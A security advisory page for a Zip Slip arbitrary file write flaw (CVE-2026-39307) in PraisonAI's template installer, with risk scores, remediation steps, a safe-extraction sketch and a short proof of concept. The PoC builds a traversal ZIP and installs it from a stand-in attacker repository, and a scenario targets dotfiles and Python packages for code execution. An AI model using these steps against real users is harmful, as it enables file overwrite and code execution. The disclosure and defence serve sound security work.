CVE-2026-39307: PraisonAI: Zip Slip enables arbitrary file write / RCE

GHSA-4ph2-f6pf-79wv HIGH CISA: TRACK*
Published April 6, 2026
CISO Take

PraisonAI's template installation feature fails to sanitize file paths in ZIP archives before extraction, allowing a crafted template to write files anywhere on the victim's filesystem via a classic Zip Slip attack (CWE-23). Any developer or AI engineer who runs `praisonai templates install` on a malicious template — whether tricked through social engineering or via a compromised community repository on GitHub — could have system files, dotfiles, or application code silently overwritten, escalating to full remote code execution. With no privileges required, network-accessible delivery, and a CVSS of 8.1, this is low-effort and high-impact; the CVE is not in CISA KEV and no public exploit scanner exists yet, but the PoC is trivially reproducible from the advisory itself, meaning any motivated actor can operationalize it within minutes. Upgrade all PraisonAI deployments immediately to version 4.5.113, and audit any community templates installed from unverified sources prior to the patch.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

CVSS 8.1 HIGH with vector AV:N/AC:L/PR:N/UI:R reflects a network-delivered, low-complexity attack requiring only user interaction — exactly the kind of social engineering that targets AI practitioners installing community content. While not actively exploited (no KEV, no EPSS data), the Zip Slip technique is well-documented and the PoC is publicly disclosed in the GHSA advisory, dramatically lowering the barrier for attackers. The PraisonAI ecosystem attracts developers building multi-agent pipelines; this demographic often prioritizes speed over operational security hygiene, increasing the realistic exploitation surface. Impact is rated HIGH for both integrity (arbitrary file overwrite) and availability (system corruption), with a plausible path to RCE by overwriting startup scripts, cron jobs, or Python package files. Six other CVEs in the same package suggest a pattern of insufficient security review in PraisonAI's codebase.

What systems are affected?

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | <= 4.5.112 | 4.5.113 |

1 dependents, 84% patched, ~0d to patch

Do you use PraisonAI? You're affected.

Severity & Risk

CVSS 3.1: 8.1 / 10
EPSS: 0.1% chance of exploitation in 30 days (higher than 21% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

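AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): Required
S (Scope): Unchanged
C (Confidentiality): None
I (Integrity): High
A (Availability): High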

What should I do?

  1. PATCH IMMEDIATELY: Upgrade PraisonAI to version 4.5.113 or later — this is the only complete fix.

  2. AUDIT: Review all templates installed from community sources (especially GitHub) prior to the patch date; check for unexpected files outside intended directories.

  3. WORKAROUND (if patching is delayed): Only install templates from verified, internal sources; disable external template installation via network policy or firewall rules blocking GitHub raw content for the PraisonAI process.

  4. DETECT: Search for recently modified files outside expected application directories following any `praisonai templates install` invocations; monitor for unexpected writes to /tmp, home directories, or system paths during template extraction.

  5. HARDEN: For custom deployments, validate the fix in 4.5.113 uses safe path extraction (e.g., checking that each member's resolved path stays within the target directory before extraction).

  6. POLICY: Treat community AI agent templates with the same risk posture as unverified third-party code — require internal review before installation in sensitive environments.

CISA SSVC Assessment

Decision: Track*
Exploitation: poc
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Article 9 - Risk management system
ISO 42001: A.6.1.1 - Information security policies for AI supply chain
NIST AI RMF: GOVERN-6.1 - Policies and procedures for AI supply chain risk management
OWASP LLM Top 10: LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

Is CVE-2026-39307 actively exploited?

No confirmed active exploitation of CVE-2026-39307 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-39307?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development environments, training pipelines, CI/CD ML pipelines.

What is the CVSS score for CVE-2026-39307?

CVE-2026-39307 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.07%.

Technical Details

NVD Description

The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory.

### Details

Location: `src/praisonai/praisonai/cli/features/templates.py` (Line 852)

Vulnerable Code snippet:

```python
zip_ref.extractall(tmpdir)
```

During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren't strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem.

### PoC

1. Generate a malicious zip payload:

```python
import zipfile

with zipfile.ZipFile('malicious_template.zip', 'w') as z:
    # Adding a file that traverses directories
    z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')
```

2. Trick a user into installing the malicious template:

```bash
praisonai templates install github:attacker/malicious_template
```

3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim's machine.

### Impact

This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).
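The containment check that the description says is missing, and that the HARDEN step asks reviewers to look for, can be sketched as follows. This is an added example, not PraisonAI's code or the 4.5.113 patch; `unsafe_members`, `safe_extract`, `build_zip` and `UnsafeArchiveError` are hypothetical names, the archives are constructed in memory, and rejecting symlink entries is a conservative choice made here.

```python
import io
import os
import stat
import tempfile
import zipfile

class UnsafeArchiveError(Exception):
    """An archive member would be written outside the target directory."""

def unsafe_members(zf, dest):
    """Return (name, reason) for each member that must not be extracted."""
    root = os.path.realpath(dest)
    findings = []
    for info in zf.infolist():
        mode = info.external_attr >> 16  # Unix mode bits, if the creator set any
        # An absolute name replaces root in join(); ".." is collapsed by realpath().
        target = os.path.realpath(os.path.join(root, info.filename))
        if stat.S_ISLNK(mode):
            findings.append((info.filename, "symlink entry"))
        elif os.path.commonpath([root, target]) != root:
            findings.append((info.filename, "resolves outside target"))
    return findings

def safe_extract(zip_bytes, dest):
    """Extract only if every member stays under dest; otherwise write nothing."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        bad = unsafe_members(zf, dest)
        if bad:
            raise UnsafeArchiveError(bad)
        zf.extractall(dest)
        return sorted(zf.namelist())

def build_zip(entries):
    """Constructed sample input: an in-memory ZIP built from {name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed archive using the traversal entry name from the advisory's PoC.
    sample = build_zip({"agents.yaml": "name: demo\n",
                        "../../../../../../../tmp/zip_slip_pwned.txt": "x"})
    with tempfile.TemporaryDirectory() as tmpdir:
        try:
            safe_extract(sample, tmpdir)
        except UnsafeArchiveError as exc:
            print("rejected:", exc.args[0])
```

Because the whole archive is validated before anything is written, a single bad entry leaves the target directory untouched; `unsafe_members` can also be run on its own to audit a previously downloaded template archive.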

Exploitation Scenario

An attacker creates a GitHub repository named something legitimate like `praisonai-enterprise-templates` or `langchain-agent-templates`, publishes a README with convincing documentation, and seeds initial stars. The repository contains a `templates.zip` archive where one or more entries use path traversal sequences (e.g., `../../../../home/user/.bashrc` or `../../../../usr/local/lib/python3.x/site-packages/praisonai/__init__.py`). The attacker then promotes the template in PraisonAI community channels, Discord servers, or via a phishing email targeting AI engineers. When a victim runs `praisonai templates install github:attacker/enterprise-templates`, the CLI fetches and extracts the ZIP without path validation, silently writing the malicious payload to the traversal target. If the target is a Python package file, subsequent imports execute attacker-controlled code; if it is a shell dotfile, the payload executes on next login. In a CI/CD context, the compromise propagates to every build run on that agent.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Timeline

Published
April 6, 2026
Last Modified
April 6, 2026
First Seen
April 7, 2026

Related Vulnerabilities